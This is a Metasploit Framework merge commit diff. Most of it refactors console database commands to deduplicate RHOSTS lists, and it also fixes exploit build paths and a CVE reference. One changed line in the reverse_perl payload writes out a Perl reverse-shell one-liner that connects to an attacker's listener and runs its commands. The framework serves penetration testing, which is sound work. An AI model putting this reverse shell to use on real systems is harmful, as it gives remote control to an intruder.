Merge branch 'master' of github.com:rapid7/metasploit-framework

sinn3r · sinn3r · commit a1f8da9ff650 · 2013-01-23T11:41:35.000-06:00
diff --git a/external/source/exploits/cve-2012-5088/Makefile b/external/source/exploits/cve-2012-5088/Makefile
@@ -9,8 +9,8 @@ CLASSES = \
 all: $(CLASSES:.java=.class)
 
 install:
-	mv Exploit.class ../../../../data/exploits/cve-2013-0422/
-	mv B.class ../../../../data/exploits/cve-2013-0422/
+	mv Exploit.class ../../../../data/exploits/cve-2012-5088/
+	mv B.class ../../../../data/exploits/cve-2012-5088/
 
 clean:
 	rm -rf *.class
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -205,6 +205,7 @@ def cmd_hosts(*args)
 			mode = :search
 			delete_count = 0
 
+			rhosts = []
 			host_ranges = []
 			search_term = nil
 
@@ -241,7 +242,6 @@ def cmd_hosts(*args)
 					output = args.shift
 				when '-R','--rhosts'
 					set_rhosts = true
-					rhosts = []
 				when '-S', '--search'
 					search_term = /#{args.shift}/nmi
 
@@ -280,12 +280,6 @@ def cmd_hosts(*args)
 					range.each do |address|
 						host = framework.db.find_or_create_host(:host => address)
 						print_status("Time: #{host.created_at} Host: host=#{host.address}")
-						if set_rhosts
-							# only unique addresses
-							addr = (host.scope ? host.address + '%' + host.scope : host.address )
-							rhosts << addr
-						end
-						rhosts.uniq!
 					end
 				end
 				return
@@ -326,7 +320,6 @@ def cmd_hosts(*args)
 						addr = (host.scope ? host.address + '%' + host.scope : host.address )
 						rhosts << addr
 					end
-					rhosts.uniq!
 					if mode == :delete
 						host.destroy
 						delete_count += 1
@@ -346,7 +339,7 @@ def cmd_hosts(*args)
 
 			# Finally, handle the case where the user wants the resulting list
 			# of hosts to go into RHOSTS.
-			set_rhosts_from_addrs(rhosts) if set_rhosts
+			set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
 			print_status("Deleted #{delete_count} hosts") if delete_count > 0
 		}
 ##
@@ -370,10 +363,11 @@ def cmd_services(*args)
 			default_columns = ::Mdm::Service.column_names.sort
 			default_columns.delete_if {|v| (v[-2,2] == "id")}
 
-			host_ranges = []
-			port_ranges = []
+			host_ranges  = []
+			port_ranges  = []
+			rhosts       = []
 			delete_count = 0
-			search_term = nil
+			search_term  = nil
 
 			# option parsing
 			while (arg = args.shift)
@@ -424,7 +418,6 @@ def cmd_services(*args)
 					output_file = ::File.expand_path(output_file)
 				when '-R','--rhosts'
 					set_rhosts = true
-					rhosts = []
 				when '-S', '--search'
 					search_term = /#{args.shift}/nmi
 
@@ -514,7 +507,6 @@ def cmd_services(*args)
 						addr = (host.scope ? host.address + '%' + host.scope : host.address )
 						rhosts << addr
 					end
-					rhosts.uniq!
 
 					if (mode == :delete)
 						service.destroy
@@ -534,7 +526,7 @@ def cmd_services(*args)
 
 			# Finally, handle the case where the user wants the resulting list
 			# of hosts to go into RHOSTS.
-			set_rhosts_from_addrs(rhosts) if set_rhosts
+			set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
 			print_status("Deleted #{delete_count} services") if delete_count > 0
 
 		}
@@ -685,6 +677,7 @@ def cmd_creds(*args)
 
 			host_ranges = []
 			port_ranges = []
+			rhosts      = []
 			svcs        = []
 			search_term = nil
 
@@ -738,7 +731,6 @@ def cmd_creds(*args)
 					end
 				when "-R"
 					set_rhosts = true
-					rhosts = []
 				when '-S', '--search'
 					search_term = /#{args.shift}/nmi
 				when "-u","--user"
@@ -835,7 +827,6 @@ def cmd_creds(*args)
 					addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address )
 					rhosts << addr
 				end
-				rhosts.uniq!
 				creds_returned += 1
 			end
 
@@ -848,7 +839,7 @@ def cmd_creds(*args)
 				print_status("Wrote services to #{output_file}")
 			end
 
-			set_rhosts_from_addrs(rhosts) if set_rhosts
+			set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
 			print_status "Found #{creds_returned} credential#{creds_returned == 1 ? "" : "s"}."
 		}
 		end
@@ -879,6 +870,7 @@ def cmd_notes(*args)
 			set_rhosts = false
 
 			host_ranges = []
+			rhosts      = []
 			search_term = nil
 
 			while (arg = args.shift)
@@ -902,7 +894,6 @@ def cmd_notes(*args)
 					types = typelist.strip().split(",")
 				when '-R','--rhosts'
 					set_rhosts = true
-					rhosts = []
 				when '-S', '--search'
 					search_term = /#{args.shift}/nmi
 				when '-h','--help'
@@ -962,7 +953,6 @@ def cmd_notes(*args)
 						addr = (host.scope ? host.address + '%' + host.scope : host.address )
 						rhosts << addr
 					end
-					rhosts.uniq!
 				end
 				if (note.service)
 					name = (note.service.name ? note.service.name : "#{note.service.port}/#{note.service.proto}")
@@ -978,7 +968,7 @@ def cmd_notes(*args)
 
 			# Finally, handle the case where the user wants the resulting list
 			# of hosts to go into RHOSTS.
-			set_rhosts_from_addrs(rhosts) if set_rhosts
+			set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
 
 			print_status("Deleted #{delete_count} note#{delete_count == 1 ? "" : "s"}") if delete_count > 0
 		}
@@ -1483,7 +1473,7 @@ def cmd_db_rebuild_cache
 				print_error("The database is not connected")
 				return
 			end
-					
+
 			print_status("Purging and rebuilding the module cache in the background...")
 			framework.threads.spawn("ModuleCacheRebuild", true) do
 				framework.db.purge_all_module_details
@@ -1714,4 +1704,3 @@ def each_host_range_chunk(host_ranges, &block)
 end
 end
 end
-
diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb
@@ -35,7 +35,7 @@ def initialize( info = {} )
 			'References'    =>
 				[
 					[ 'CVE', '2012-5088' ],
-					[ 'URL', '86352' ],
+					[ 'OSVDB', '86352' ],
 					[ 'BID', '56057' ],
 					[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],
 					[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb
@@ -48,7 +48,7 @@ def command_string
 		lhost = datastore['LHOST']
 		ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
 		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-		cmd   = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
+		cmd   = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"}
 	end
 
 end

Original file line number	Diff line number	Diff line change
`@@ -35,7 +35,7 @@ def initialize( info = {} )`
`35`	`35`	`'References' =>`
`36`	`36`	`[`
`37`	`37`	`[ 'CVE', '2012-5088' ],`
`38`		`- [ 'URL', '86352' ],`
	`38`	`+ [ 'OSVDB', '86352' ],`
`39`	`39`	`[ 'BID', '56057' ],`
`40`	`40`	`[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],`
`41`	`41`	`[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]`